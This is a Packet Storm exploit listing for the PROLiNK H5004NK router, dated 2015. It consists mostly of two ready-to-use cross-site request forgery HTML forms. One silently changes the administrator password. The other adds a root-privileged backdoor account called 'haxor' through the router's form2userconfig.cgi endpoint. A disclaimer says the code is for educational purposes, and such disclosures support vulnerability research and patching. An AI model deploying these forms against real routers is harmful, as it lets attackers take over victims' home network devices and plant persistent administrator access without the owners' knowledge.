PROLiNK H5004NK Cross Site Request Forgery

2015-04-21T00:00:00
ID PACKETSTORM:131554
Type packetstorm
Reporter Osanda Malith
Modified 2015-04-21T00:00:00

Description

                                        
                                            `# Exploit Title: PROLiNK H5004NK Multiple Vulnerabilities  
# Date: 16-04-2015  
# Firmware: R76S Slt 4WNE1 6.1R   
# Tested on: Windows 8 64-bit  
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)  
# Disclaimer: Use this for educational purposes only!  
  
  
#1| Admin Password Manipulation XSRF   
-----------------------------------------------------  
  
<html>  
<body>  
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">  
<input type="hidden" name="username" value="admin" />  
<input type="hidden" name="oldpass" value="password" />  
<input type="hidden" name="newpass" value="admin" />  
<input type="hidden" name="confpass" value="admin" />  
<input type="hidden" name="modify" value="Modify" />  
<input type="hidden" name="select" value="s0" />  
<input type="hidden" name="hiddenpass" value="password" />  
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
#2| Adding a New Root Account XSRF   
-----------------------------------------------------  
  
<html>  
<body>  
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">  
<input type="hidden" name="username" value="haxor" />  
<input type="hidden" name="privilege" value="2" />  
<input type="hidden" name="newpass" value="123" />  
<input type="hidden" name="confpass" value="123" />  
<input type="hidden" name="adduser" value="Add" />  
<input type="hidden" name="hiddenpass" value="" />  
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
`